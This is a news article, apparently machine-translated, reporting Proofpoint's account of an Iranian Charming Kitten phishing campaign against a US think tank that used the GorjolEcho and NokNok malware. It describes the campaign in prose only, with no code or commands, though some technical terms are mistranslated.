Charming Kitten: the evolution of cyber-attacks and new digital security threats

Recently, a US think tank was targeted by Charming Kitten, a well-known group of Iranian cyberartists. According to a report by Proofpoint, the group implemented a macOS PowerShell retrovirus during the attack. The malicious action was initiated in mid-May, when a request for feedback on a project was sent to the think tank's nuclear safety expert. The same email also asked for permission to send a sketch for review.

GorjolEcho and NokNok: two dangerous digital security threats

In a subsequent email, the cyber-espionage group sent a malicious link that directed the recipient to a password-protected archive, hosted on Dropbox, containing a file called LNK. This file triggers an infection chain that leads to the release of a new PowerShell retrovirus, dubbed GorjolEcho by Proofpoint. This malware consolidates itself on the system and displays a fake PDF to the recipient, while in the background exfiltrating information to the command and control (C&C) server. A week later, the Charming Kitten group sent an email message containing a password-protected ZIP file that starts a chain of infections, tailored for macOS, leading to the deployment of a bash script that establishes another persistent system retrovirus.

The technical details of the sophisticated activity of cyber-criminals

Known as NokNok, the script described, according to Proofpoint, "is almost certainly a port or evolution of the aforementioned GorjolEcho and is intended to serve as a first foothold" within the victim's system. NokNok, which contains four modules, is able to collect credentials from the infected machine, list all currently running processes, record system information, network information and software information, and then send the data, encrypted, to the C&C server. According to Proofpoint, both GorjolEcho and NokNok could support additional modules that expand their functionality.

Charming Kitten: A cyber-espionage group behind multiple attacks

This new attack differs from previous Charming Kitten campaigns, which generally relied on VBA macros and remote model injections for malware delivery, the cybersecurity company points out. Despite this, Proofpoint attributes the attack to the Iranian group with great confidence, based on the similarities of the code between GorjolEcho and NokNok and malware previously linked to the group, including GhostEcho, CharmPower and MacDownloader. Charming Kitten, also known as APT42, Mint Sandstorm (formerly Phosphorus), NewsBeef, Newscaster, TA453 and Yellow Garuda, is believed to be operating on behalf of Iran's Islamic Revolutionary Guard Corps (IRGC). In the past, the group has been responsible for targeted attacks on activists, government organizations, journalists, and other entities, as well as conducting ransomware attacks for financial gain. “TA453 continues to significantly adjust its infection chains to complicate detection efforts and conduct cyber espionage operations against its targets of interest. TA453's willingness to bring malware to Mach-O demonstrates the considerable efforts that the actor of the threat it is willing to implement to achieve its objectives,” Proofpoint stressed. The continual adaptation of attack tactics by cyber thieving groups such as Charming Kitten further accentuates the need for vigorous cyber defense and continued awareness of the risks present in the digital domain.